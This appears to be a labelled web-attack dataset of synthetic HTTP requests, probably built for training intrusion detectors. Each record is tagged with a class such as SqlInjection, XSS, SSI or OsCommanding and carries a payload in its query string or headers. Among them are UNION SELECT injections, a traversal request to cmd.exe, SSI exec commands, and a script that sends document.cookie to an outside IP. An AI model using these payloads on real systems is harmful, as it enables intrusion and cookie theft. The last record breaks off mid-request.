GET /1ginwgi4tvdwniTpmh/pru/ms2kQOvNLRqZ/oto/xS4gN2l@zZn9Oue.cfm?n0G2CyWcLJbE=nL+nr%29r%3Cconnect+etrWo&84Va0rT83=ir%27%5D++%7C++++P+++%7C+%2F%2Fuser%5B+name%2Ftext%28%29++%3D%27oLe&ATf1xMnmHstyleQH=idJnA0&t9P6Zwindow.openGGQO=gDtzF2kw3d5&7pateynM1=sR+asto-ea&esGg6hvtad=tug1nh HTTP/1.1
Host: www.gelpoxd.st
Connection: close
Accept: */*
Accept-Charset: iso-8859-6;q=0.5, cp-932;q=0.0, hz-gb-2312, x-mac-chinesetrad;q=0.4, iso-2022-jp
Accept-Encoding: compress, compress, deflate;q=0.7, gzip;q=0.2
Accept-Language: oep-caen;q=0.3, It0Irr-I9xa, ymhcdyue-enGw;q=0.1, oRoa-a66b0;q=0.7
Cache-Control: min-fresh=8
Client-ip: 132.114.34.1
Cookie: FKmwk=n7ntar2sdoiwaE;fht1t=rcdeb8iI8hz;a8aqwrtn83dltti=annddrennkr;aioec=pcB;m36lluxgal8aeth=OoVN
Cookie2: $Version="16"
Date: Sat, 25 Sep 04 20:02:00 CET
ETag: "45E@hf2nml@00lw"
Expect: 100-continue
From: wiNgsai@oernriaeee.de
If-Modified-Since: Mon, 18 Jun 07 18:56:53 UTC
If-Unmodified-Since: Fri, 03 Feb 06 01:01:40 UTC
If-Match: "LO9b7hYY9eNClVead"
If-None-Match: *
If-Range: "VG00Mw9pd70WJk."
Max-Forwards: 4941
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM ZGRhaWJzeWVub0VzdHN0ZnRIZTBhZXNodHN6MW1ud3RiZWo3Yw==
Authorization: Basic MGNudHNPZjphamF1
Range: 124-314534,89-
Referer: /tmQj/dmsngpls/hoacg.jpg
TE: deflate;q=0.8,chunked;q=0.4
Trailer: Range
User-Agent: tynulhnsty3ss32tcpx
UA-CPU: StrongARM
UA-Disp: 879,0728,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 122x540
Via: pen/3.9 www.netdBan7.png, 8l2i/4.1 www.igeeddb.tiff
Transfer-Encoding: identity
Upgrade: iasi6m/1.5, ep9/4.9, ip9nui/4.5
Warning: 760 227.98.126.37 "nIw39hepCclatnett8" "Tue, 06 Nov 07 04:36:32 GMT"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49597
Start - Id: 37738
class: LdapInjection
GET /tdceny/sike3tltutne.html?nnassthioh=%29+%28+%7C+%28displayName%3Dhad*%29++++%28name+++%3D++++had*%29%28++mail%3Dhad*%29 HTTP/1.1
Host: 73.55.23.217
Connection: keep-alive
Accept: application/*, application/x-tar;q=0.7
Accept-Charset: big5, windows-1257;q=0.3, iso-8859-6, iso-2022-kr
Accept-Encoding: identity, gzip;q=0.0, deflate;q=0.8, compress;q=0.3, compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 136.48.47.50
Cookie: ioirui=0t
Cookie2: $Version="7"
Date: Thu, 11 Mar 04 14:53:10 CET
ETag: "TwKjEnP9b6CUMxEiANMS"
Expect: 100-continue
From: ft5sbsfs@ttt1ze.uk
If-Modified-Since: Tue, 21 Nov 06 21:50:08 UTC
If-Unmodified-Since: Sat, 09 Jul 05 07:19:19 UTC
If-Match: "ZU107W6HC9QbDAzi6um4"
If-None-Match: *
If-Range: Sun, 08 Aug 04 08:00:26 UTC
Max-Forwards: 7901
Pragma: pa='5b'
Authorization: Digest username="tau8fte"
Range: 79793-4
Referer: http://esC3bt.fr/ljEGgrO/regS0Uh0.asp
Trailer: Date
User-Agent: Mozilla/1.0 (Windows; U; Win98 4.1; hn-hv; rv:9.9.6) Gecko/28103940
UA-CPU: x86
UA-Disp: 756,0789,32
UA-OS: Solaris
UA-Color: color32
Via: FTP/6.8 www.zlsotas.html:692, 8.5 228.187.118.220, 1.5 www.Irncenet.png:9697
Transfer-Encoding: eeehNs; derft=eep3tnt
Upgrade: 4da/3.4
Warning: 069 www.lmgThl1.html "siohotdtta4mee" "Sat, 10 Jan 09 23:15:18 UTC"
X-Forwarded-For: 33.253.224.201
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37738
Start - Id: 39134
class: SSI
GET /syeapo96stnii/rsehlvOSMahvdrdyae/e5Oe/s-L/oU6V7/eh1umhrtpstHyaYlenc/eJ.kRrYrkZYZ/qPsYmDaQ9V8w.dll? HTTP/1.0
Host: 218.130.7.181
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: <!--#echo var="date_gmt"-->
Cache-Control: min-fresh=984
Client-ip: 185.24.103.43
Cookie: aHn4e=4lcOiaoI;nh3issg=attd0eu1l=iwinnt;fVsmEesethhmhr=hl9obroOor;eYnsamdeAxULTq=efg50iqlL;yaiatclwho=9
Cookie2: $Version="443"
Date: Sun, 23 Mar 08 21:43:32 UTC
ETag: "WILM38mkEG2SO7@POY"
Expect: hhrmhd=rphdd;asdd=medas
If-Modified-Since: Thu, 03 Jan 08 19:55:25 CET
If-Unmodified-Since: Sun, 26 Nov 06 03:15:57 CET
If-Match: "NIphmKf@4sbEYTz"
If-None-Match: *
If-Range: "qatT0qY75NlDv7c1"
Max-Forwards: 6
MIME-Version: 8.3
Pragma: vyst5ihe=8yse
Proxy-Authorization: Digest nonce
Authorization: Basic d25Jcm46ZWlkY3ZM
Range: -55067
Referer: /amlNie/leU4efa/EztiN.jsp
TE: trailers,gzip
User-Agent: wa2deh5u8tolgeea
UA-Disp: 036,845,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 062x6317
Via: 8.5 120.88.245.175, 7.6 www.l5wie8.htm
Transfer-Encoding: deflate
Upgrade: ovle/8.4, aroHm/4.2
Warning: 897 250.38.91.23:5 "auyT" "Wed, 26 Oct 05 13:46:39 UTC"
X-Forwarded-For: 136.245.189.109
X-Serial-Number: 55795183768
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39134
Start - Id: 35242
class: SqlInjection
GET /isgenlhd/y4-eQY/coasiihiuiaM95/evLbW9MMix6On4zk/ia/0emtfedsr/aetceqnnt/wrdflla/xA5rpp-JdhUpaF.ka6R.jsp?HTtmpg3JopenJ3=%27+++%29+UNION+++ALL+++++SELECT++matuBa+++++%2C+ckjt8+++%2C+++ypiiohcn+++++FROM++++9nm++WHERE+++++iomvt+++++NOT+++IN+++++%28%27esu7hwquni%27++++%29++AND++iIvGn3++++NOT++++IN++%28+++%27tel%27++%29+++AND++%27%27+++%3D%27 HTTP/1.1
Host: www.hiiuaEgieo.biz:80
Connection: ir79tsd
Accept: audio/*, image/jpeg
Accept-Charset: x-mac-korean, iso-2022-jp, windows-1254;q=0.5, cp-950;q=0.4
Accept-Encoding: 
Accept-Language: t-e, rfhiata-e0sir, eno-rt1ev;q=0.7, ANttes-5;q=0.5
Cache-Control: max-stale=106
Client-ip: 61.19.198.20
Cookie: irhwhsou7x=eVnkl;anwsns=s4e;rwougk4Fiie=diia;MsgP=f 3group byc7zxfn7itee:s;swh8ht=28760;2o=nes
Cookie2: $Version="78"
Date: Mon, 13 Feb 06 22:19:50 GMT
ETag: W/"jqRyTt_G6V.5opQIoq5"
Expect: 100-continue
From: eanchR@cq4m.gov
If-Modified-Since: Sat, 08 Jan 05 11:57:59 CET
If-Unmodified-Since: Wed, 23 Nov 05 10:52:52 GMT
If-Match: "o64x6zlvVa_jB03.F"
If-None-Match: *
If-Range: "DHdhqF2KTLqOpkX"
Max-Forwards: 66
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic MW84clFpcnM6aXVnaA==
Authorization: Basic eTZlNDpocmdzSQ==
Range: 233007-
Referer: http://mtnz.be/rae2ipn/tbwssen/an2hiah/aveE896.swf
TE: gzip;q=0.1,deflate;q=0.7,trailers
Trailer: Warning
User-Agent: Mozilla/6.7 (X11; U; Linux i586 6.6; vm-yl; rv:1.7.9) Gecko/69844299
UA-CPU: 68000
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: HTTP/4.5 103.188.40.183, FTP/6.5 253.143.108.102
Transfer-Encoding: yfqcxb; eikstlig=nie7
Upgrade: rtrrq0/4.2, nltst/2.4, Sic/2.9, oaewts/4.5
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 242.188.252.188
X-Serial-Number: 99658845770
----: -----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35242
Start - Id: 44385
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 196.154.185.166
Connection: OeL8qc
Accept: image/*, application/*
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.4, compress, gzip;q=0.1, compress
Accept-Language: *;q=0.3
Cache-Control: min-fresh=2
Client-ip: 25.151.126.170
Cookie: Levali3Azc07p=hxKyH;e7mtzdemeWthe=eXH5r;tleshh=dlTwhl;odstt6e=ruea;hBCq=nqrdEvf?psa6sw;aglsOseRtoe43=eWUe
Cookie2: $Version="962"
Date: Mon, 25 Apr 05 12:43:51 CET
ETag: W/"obTbaYx6BR7gH4UQQTN9"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Mon, 23 Jun 08 11:44:47 UTC
If-Unmodified-Since: Mon, 03 Nov 08 02:01:35 GMT
If-Match: *
If-None-Match: "dcNs23J-dHPSJRW9"
If-Range: Sat, 24 Jun 06 20:55:00 GMT
Max-Forwards: 6
MIME-Version: 1.4
Pragma: T='idt'
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: Digest nc=E88c7DfF
Range: -843519
Referer: http://www.blo2imeT.it/ke2yh/ecajcbs/so0et.php3
TE: trailers,chunked;q=0.5
Trailer: Proxy-Authorization
User-Agent: hc4le2n9/9.5.2.9.9
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8335x3340
Via: HTTP/0.3 www.sln60tns.htm, HTTP/1.6 9.21.114.223:01012, 6.9 www.klSi.shtml
Transfer-Encoding: identity
Upgrade: sltIe/4.5, 7smi/8.6, fir/0.7
Warning: 551 92.44.38.235:34239 "tifgnertsiaoesxw" 
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44385
Start - Id: 47738
class: XSS
GET /ec0oq5KS./3XZZupNkBmmzD-4/nSpfGE.msf?eSedCicvSFi=%3Cimg+++++src%3D%26%7B%5Bwindow.open%28%27http%3A%2F%2F164.56.173.229%2Fal.cfm%27%2Bdocument.cookie%29%3B%5D%7D%3B+%3E&duBhniidSeawvhe=Hde8&se75Uff=mt0&ax=9631&EH4EDUWiC9=oy%3C%5Cnv%29&4estolysenmeqm=2796&nodthafe=i2K&lsyafoEqet=09744360&hsbcvUtntj=cowo&6viCformy=sz86uLbzA HTTP/1.1
Host: 88.36.50.196
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: compress;q=0.0, deflate, identity;q=0.5, identity;q=0.1, identity
Accept-Language: s-zndiA;q=0.7, s-inho3, espn-ntf, 2eoithsn-e6l;q=0.0, M1nop-bSsiYx;q=0.9
Cache-Control: abac4enA=ns0
Client-ip: 190.127.106.120
Cookie: us=ae2n;4eFp-DQsA.=l]em0dteD;f1K.GtT3=itlikes;za=he_VeDk2.;RlgipsatehaHa=w jl1sRytntmse;tca5xeretefr=8841
Cookie2: $Version="054"
Date: Thu, 29 Jul 04 11:14:17 GMT
ETag: W/"t4qPdTf4owKXp5pB@_"
Expect: asn70
From: rlNe@ecetad6.fr
If-Modified-Since: Fri, 02 Sep 05 05:05:47 UTC
If-Unmodified-Since: Sat, 20 Mar 04 04:40:28 CET
If-Match: "Dqeik0nWrJJc@nEtAQ"
If-None-Match: "YAlcOtQPurdfiboFdS"
If-Range: "VA-2U3zaHesYoQssS69"
Max-Forwards: 523
MIME-Version: 7.7
Pragma: ehUEzeMe=od5rbea
Proxy-Authorization: Digest response="D8344b9E3FE9A6df47B462B8bDbe58B1"
Authorization: Digest response="F9baAe9ba8b2034BB34f77E04E268E69"
Range: 9-,057-2,501963-763
Referer: /itte/EhIner/qenhnerl/aattuoar.php
TE: gzip,chunked;q=0.8
Trailer: Date
User-Agent: hsyh5drlee (t1n3fr; t-CjGqF@X; uap2EkJ9; wKYIPdF_f5)
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0710x100
Via: 0.3 www.cnOsnEfk.jpeg, 8.6 www.nhgaJ.jpg
Transfer-Encoding: Ortu; dz2you=td8thhn
Upgrade: 1eEw/6.0
Warning: 204 41.21.10.144 "pfgeDet" 
X-Forwarded-For: 147.116.190.16
X-Serial-Number: 08031328367563648957
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47738
Start - Id: 41208
class: SqlInjection
GET /dfj8@ZI-/cb.bN.X/fA2x0RONfHF8/vbscriptfstdinssreplacee4aGupdateQ.tiff?eulOis=0&R79htacces4Bposition=26188&lstSadhoil=hf&nbEcmrze4o=s6pnochildephph HTTP/1.1
Host: 47.13.36.215
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-korean;q=0.4, utf-8;q=0.4, us-ascii, utf-7
Accept-Encoding: OR    'vtat'    = N' '
Accept-Language: *;q=0.7
Cache-Control: ms='g'
Client-ip: 116.254.118.56
Cookie: isiFsptoh2r=638;OP6hZ-Wp1v=ysmaild;esesjicSo4=4;prdnwQooeoona=riei ao3)
Cookie2: $Version="19"
Date: Sun, 11 Mar 07 19:26:09 UTC
ETag: "y_rtOdxyriRe@WzUIbK"
Expect: iite=iaeqd;nirtl
From: tercor@topretr.biz
If-Modified-Since: Mon, 14 Dec 09 11:05:33 UTC
If-Unmodified-Since: Sun, 07 Sep 08 23:57:51 GMT
If-Match: "9XHerSZIht5Wg@VJMa"
If-None-Match: "7dEOX6ERtmr7NHcFUO"
If-Range: "xg959zMAR-AA@b4k"
Max-Forwards: 69
MIME-Version: 0.2
Pragma: eae7=lS7
Proxy-Authorization: Digest uri=http://www.aabnei.st/T2mnZiu/n1sace/ntAt/ohsoyate.jsp
Authorization: Digest username="s2moeS"
Range: 53-4,37-,6-8482
Referer: /Ibf0h.pdf
TE: trailers
Trailer: Expect
User-Agent: ce1ec550
UA-CPU: MIPS
UA-Disp: 1760,871,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9140x4441
Via: 7.0 185.89.50.166, HTTP/1.4 www.weseGne.js
Transfer-Encoding: identity
Upgrade: tiucmt/8.8, gTet/0.0, acopr/9.9, uni/6.8
Warning: 023 www.aubonl.html "brwUpele7rpookpse" "Tue, 09 Mar 10 24:01:48 CET"
X-Forwarded-For: 193.219.83.250
X-Serial-Number: 9505530425947859
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41208
Start - Id: 49448
class: XPathInjection
GET /hJdjfgn1VClrO7XPm/wYgq2OltKBD_w/9rio-p-SIZ9V.nsf?3aume8zbs=t9xrsey%27%5D++++%7C+++P+++++%7C+%2F%2Fuser%5B+++name%2Ftext%28++%29++++%3D++%27tg&divWSF.Ht7execC=miab3%40P6&elwafrpi=iGU0 HTTP/1.1
Host: 92.100.225.38:5775
Connection: Pjrigavd
Accept: image/*;q=0.5, video/*, video/quicktime;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: gzip
Accept-Language: r-he;q=0.6
Cache-Control: snL=iute6
Client-ip: 111.175.169.32
Cookie: connectRMQdZinputOI6mn=selectafroma =/urestconnectn ruoeval;n.EWG9f=insert l);hbotstohgbesing=t1.8ueswCb@;ouv=iptzC;71g=3504;se8eetnenlisMdn=uesyGhTo
Cookie2: $Version="260"
Date: Thu, 28 May 09 18:31:06 CET
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: skayetla
From: n5thibdN@srSdAet.st
If-Modified-Since: Sun, 30 Apr 06 15:09:30 CET
If-Unmodified-Since: Mon, 23 Jan 06 16:47:43 GMT
If-Match: "GcEp3ypmu@-2ZUfMk"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 3.6
Pragma: m=gelnEeb
Proxy-Authorization: Jundcr iervTn=RhAbnay
Authorization: Digest nc=Eaa6Fc41
Range: 894764-6
Referer: /frosb/Hhdrd.jsp
TE: gzip;q=0.0,deflate;q=0.7
Trailer: If-Match
User-Agent: t5hgtefc9E (i8.-7@z7_Z)
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 950x8575
Via: FTP/3.2 www.2Opg.html:05816, cnt/4.7 123.191.221.150, FTP/8.1 www.lnwmusA.jpeg:38219
Transfer-Encoding: identity
Upgrade: 4wre/8.6, sckoiq/7.6
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 210.37.128.90
X-Serial-Number: 812184590933752195
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49448
Start - Id: 39993
class: SSI
GET /eqc0EnseoIEvl0ynm9/eptA7eio2fenrts/dtaoto/sIUSjksin6mbA48g/nin8oEso3intTxFarxe2/nnednwos/_rm-.png?egsloesamedh=dtbcnetcat%3Ftnegeewunion&ryO=2059222&mTo=e+es&hGsEaE0iaiit=%7C%2B0dse6s1kx0T&tEeoetadwnntkue=%3C%21--+%23exec+++++cmd%3D%22%2Fbin%2Fls+++++-l++%2Fhome%2Fto5n8sT%2Fimmutajna%22++++--%3E&2rdehjga=notqtcc&eha=jn7aWrhfZrp2Amiicn&ijritieslrndh3=nuJ97 HTTP/1.0
Host: 170.239.100.211
Connection: eE3eem8
Accept: image/*, video/*, application/postscript
Accept-Charset: *
Accept-Encoding: *
Accept-Language: hi-anl;q=0.0, ttntow-eiracut;q=0.9, jopnh-neeulia;q=0.9
Cache-Control: min-fresh=9672
Client-ip: 233.171.43.76
Cookie: docsurmmgo6a=seWA1MpM2A;aqceitnnta=waey
Cookie2: $Version="26"
Date: Thu, 15 Apr 10 20:32:19 CET
ETag: W/"snzYcROZfCdT0_HXP"
Expect: 100-continue
From: atetgwlh@rphs.com
If-Modified-Since: Thu, 21 Jul 05 06:20:02 CET
If-Unmodified-Since: Thu, 08 Apr 10 22:18:27 UTC
If-Match: "5ATC9_blYrj3waAP5o0"
If-None-Match: "9a-dDsrLxzgaIaW2"
If-Range: *
Max-Forwards: 571
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: NTLM NlQ2YWhtdWl0dGR2TGxlem9OZW50dG9vaXI5VTVicmlzc2xnbm9rZW9sdGVuZWU=
Authorization: Digest response="5dc4135A5DF33d19fFc37CdbA06B50E0"
Range: 618-573,4-,461-
Referer: /2acdlz/oetE4/sw0saeeU/faux.asmx
TE: deflate;q=0.5
Trailer: TE
User-Agent: vnhcsysqt
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 860x1351
Via: 0.7 www.7yywai.js, acRts/9.7 98.22.82.136
Transfer-Encoding: deflate
Upgrade: tati1/9.0, By2egw/7.7, naml/5.4, tau/2.1, 0aZt7/2.6
Warning: 144 202.212.126.14 "EZtzaaiitexz9rs" 
X-Serial-Number: 18116
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39993
Start - Id: 40269
class: SSI
GET /L0sekhds3/RTTa/t.McW27aBH.W/rFY/ta/a2pbxpIehet3mtrdh/2nt9tRhhtolyderSmo2/w8dgtto/ecp00z7ufG@/nvrA4QhJRl/ylink3O9ofromT8G.pl?7Z9Hhh1where=hPZrYQHC.FZ&eeIhrleGa0Wgn=%3C%21--+++%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5CasahsD%5C2tpszMp%5CstOsrilc.exe+++++d%3A%5CrzrmYdo%5Cwww.orge.org%5CHw%5Cdatabase.mdb+++++%2Fx+++exporttofoxpro%22--%3E&ahth=1363254 HTTP/1.0
Host: www.ossd6necI.cz
Connection: bwstra
Accept: */*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: bespa-iyinIn, 1-yrbwen2
Cache-Control: min-fresh=827
Client-ip: 52.223.207.82
Cookie: ioh9cprxe=555447;atr=vrsB9kyi6ijnntt
Cookie2: $Version="14"
Date: Sat, 09 Jun 07 22:19:17 UTC
ETag: "Ee4CnpUuP3uF079SGa"
Expect: 100-continue
From: sinl@n3biht.ch
If-Modified-Since: Thu, 07 Aug 08 10:48:54 UTC
If-Unmodified-Since: Fri, 30 Jan 04 10:39:01 GMT
If-Match: *
If-None-Match: "al9Ci8aqrUkjFeBH"
If-Range: Fri, 24 Aug 07 20:38:47 UTC
Max-Forwards: 58
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/A2lAseE/fmtkprd/sito/xrIox8.avi
Authorization: Digest nonce
Range: 1030-
Referer: /k3ib.bin
TE: trailers
Trailer: Authorization
User-Agent: pbe5r/8.2.4
UA-CPU: MIPS
UA-OS: Win95
UA-Pixels: 6936x3425
Via: 0.7 237.2.190.228, 8.2 37.230.56.149:1175, HTTP/4.8 112.196.132.144
Transfer-Encoding: identity
Upgrade: zebo/3.9
Warning: 487 www.1qtdgidu.tiff "h7idno2aalutGrerznAt" "Sun, 05 Mar 06 10:34:02 UTC"
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40269
Start - Id: 47183
class: XSS
GET /iPesihnnyrasedv4let/iirVteicvssiefmtAt.jpeg?Ifscebnasieekq2=autowsb&HP=03502391&dRH=%3Cdiv+++style%3D++%22+binding%3A+++++url%28%5Bhttp%3A%2F%2Fwww.alna.com%2Fscript%2F5tua.bin%5D%29%3B++++%22+++%3E&bIhh98t9a=nnsteo HTTP/1.1
Host: 227.227.214.1
Connection: hi6ieee3
Accept: */*;q=0.4
Accept-Charset: koi8-r, koi8-r
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=7
Client-ip: 65.151.77.8
Cookie: utIg6xRXgvH=bbE;IsL50aoodhioe2c=aq
Cookie2: $Version="93"
Date: Sun, 25 Jul 04 16:20:47 UTC
ETag: W/"sx302XohAygbTfJiaE"
Expect: 100-continue
From: fpss@iohe.it
If-Modified-Since: Mon, 22 Nov 04 10:30:00 GMT
If-Unmodified-Since: Sat, 09 Dec 06 11:53:44 CET
If-Match: "KpN0d.NNBWyf3Np.O"
If-None-Match: "OaO7O@WsxR_JcltmE6lZ"
If-Range: Sat, 02 Dec 06 01:40:03 UTC
Max-Forwards: 346
MIME-Version: 1.6
Pragma: uva='di'
Proxy-Authorization: NTLM ckhVbThFczZLOW9pcWFjb2FkaWNlbHVDdzJpVWJya3BoZWUz
Authorization: Basic b0FuTTJubjpoaGZlbWdT
Range: 671-463
Referer: /Udela/4lootees/vxetH.pdf
TE: deflate;q=0.8
Trailer: Transfer-Encoding
User-Agent: tlstgtlt5
UA-CPU: MIPS
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6020x621
Via: cssder/9.0 209.74.113.78
Transfer-Encoding: compress
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 85.51.180.168
X-Serial-Number: 533969856895
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47183
Start - Id: 37240
class: LdapInjection
GET /o.HBY/tpO7Ky/ort9cgus/tporjtnoilabueignrem/n8DVGSW0a/oseiymEf/d9rU_/Wtslswl2ctusnnlTteua/2fepeulddmjdyz/lnDYy/ist/nsNLD16blUs.nsf?deitdibgualhi=iJNi5g&aus=+H&iu=aasdotuea&so4jEc29rczsen=6hnetcatmRrelt%27dutsv&5twGO-=c0_&nLoycnoere=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&ayni0pqelwraTnr=7&ileitla=qDLeNikhLm&ar=1544726315 HTTP/1.0
Host: www.0Froh.gov
Connection: tioe
Accept: audio/basic;q=0.9, text/*
Accept-Charset: cp-950, iso-8859-8-i;q=0.7, cp-932;q=0.0
Accept-Encoding: 
Accept-Language: oerie-Grb2
Cache-Control: min-fresh=4928
Client-ip: 47.19.215.50
Cookie: 4so1nOUlrheo=3339337;rmtstd=3y1o;ErvttemeAnd0=tsglio;eUttnHrecqseeoe=d6NUt3lkDbRF
Cookie2: $Version="816"
Date: Sun, 24 Apr 05 01:22:44 GMT
ETag: "6rrN9a41Ue-7eg8e0W0"
Expect: nnsar
From: ayecOy@eouq6oE.de
If-Modified-Since: Sat, 11 Oct 08 08:53:22 CET
If-Unmodified-Since: Tue, 21 Nov 06 04:11:53 CET
If-Match: "NL2X7@61VdelnlGgi"
If-None-Match: *
If-Range: "A1up1YKmbEegNY7Jj0"
Max-Forwards: 0583
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM b290WWNidHVyZWFtcG85c2hwZXNsZXJhZWV0bmVvMTlvdG4wc2l5ZGM5bGE=
Authorization: Htseo kOIv=thetog
Range: 38889-,402727-278555
Referer: http://www.aoas.com/1ghesie.jpg
TE: deflate
Trailer: Via
User-Agent: Mozilla/8.3 (compatible; wieseav8S; SunOS sun4u; aliEes)
UA-CPU: PowerPC
UA-Disp: 836,441,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 322x932
Via: 9.4 8.82.230.223, HTTP/8.6 184.73.164.59, saehx/6.9 196.2.63.78
Transfer-Encoding: weqp; e0tpea4=ettre
Upgrade: aybij/7.6, 6sthiq/6.8, nNx/6.1, wAen/2.4, 0taES/8.7
Warning: 519 www.ieWtti.tiff "seRierlduyai" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37240
Start - Id: 42547
class: SqlInjection
GET /tb8iIIe/h8Y_XXtihdFPJQn5Z9TV/hsgaoegkaAumrEssHm/plnaotlEctlon4l/eaSth0h3/epn04Xs-ZFUBgFg/W1Hhtrcpvr4T-4/ep-U1rgBEkEk/eOhr/ea3qObnuhbi3bnnRwwg.gif?tA21ojqS8da9aen=g9g8cn+y&QLvuIK=%27++union++select+++sum%28saqhelEf%29++++from+++++C4ai5h--&s1yer01ezoHt=osystemef+hIop&fclrTxpgt=y7t&8tamstgt21sznnl=%3Act%29t&amerdeypader=xCSn&arawYidiaenf=aqznkC%40wE&ln5oso=+eorwda9e8&cuniOT8eua=6587414&httpsKwindow.openiab2AWw=v9ke&duta=nodekbstdink8qdi&n9y=7026&sh8u0dyot6ent=8060085 HTTP/1.1
Host: 72.243.235.202
Connection: zkaeDan
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, deflate;q=0.1
Accept-Language: R5s-tnneadk;q=0.0, oaeepth-1egiewt;q=0.9, jE-drbaryi;q=0.1, rtaf-cei;q=0.4, nhi-xu
Cache-Control: max-age=46
Client-ip: 15.200.32.132
Cookie: BAbotorI=sQ0-c2aI8;lasakteprgsws=tgfprocessing-instruction4nwhtsi9fj;ywzexh1ot5oo7=34
Cookie2: $Version="597"
Date: Tue, 20 Jul 04 07:16:27 GMT
ETag: W/"gEAy5nWg0ykG4kp-"
Expect: oc967Rm
From: nxfuvsb@brtsroeeU.org
If-Modified-Since: Sat, 12 Dec 09 07:49:49 GMT
If-Unmodified-Since: Sun, 10 Feb 08 24:23:11 GMT
If-Match: "YCHfNxaPI4v6f5y"
If-None-Match: *
If-Range: Wed, 20 May 09 24:21:17 UTC
Max-Forwards: 4928
MIME-Version: 3.7
Pragma: Homn='v'
Proxy-Authorization: Basic b3JoaWlzczowbjVuZWlP
Authorization: NTLM YWNjZ0FuRUd0aGVpb3djeWRlb3lnc3RBbGFlZHluczh1b3RidGx0bzNOSUU=
Range: 6-84675,628-,982-49
Referer: http://ktaye.de/qdtl/ros1nn/sssey/peituDe/dtDnruns.aspx
TE: gzip;q=0.0
Trailer: Via
User-Agent: Mozilla/4.3 (compatible; Konqueror/1.8; Linux i586; onei2esOhn; gsL4; z2428eae)
UA-CPU: x86
UA-Disp: 962,664,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8264x986
Via: 7.7 www.salfoeT.png, 0.2 www.1lrhr.css, HTTP/4.2 87.92.174.85:17978
Transfer-Encoding: compress
Upgrade: aehy/9.2, etyl/6.6
Warning: 087 94.225.210.152:5070 "hd1enneoq" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 14019668167016941
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42547
Start - Id: 41377
class: SqlInjection
POST /quenwssn/BpnowyoNy0rsab/e-y/e8f3ojR/ef4l7setaestdm/epo4vaop97ag8/eVRD9-ncFspyx7Az2c.bin? HTTP/1.0
Content-Length: 146
Content-Language: Esrb2
Content-Encoding: deflate
Content-Location: /rumio/r9lul/2zSe/nemEo.msf
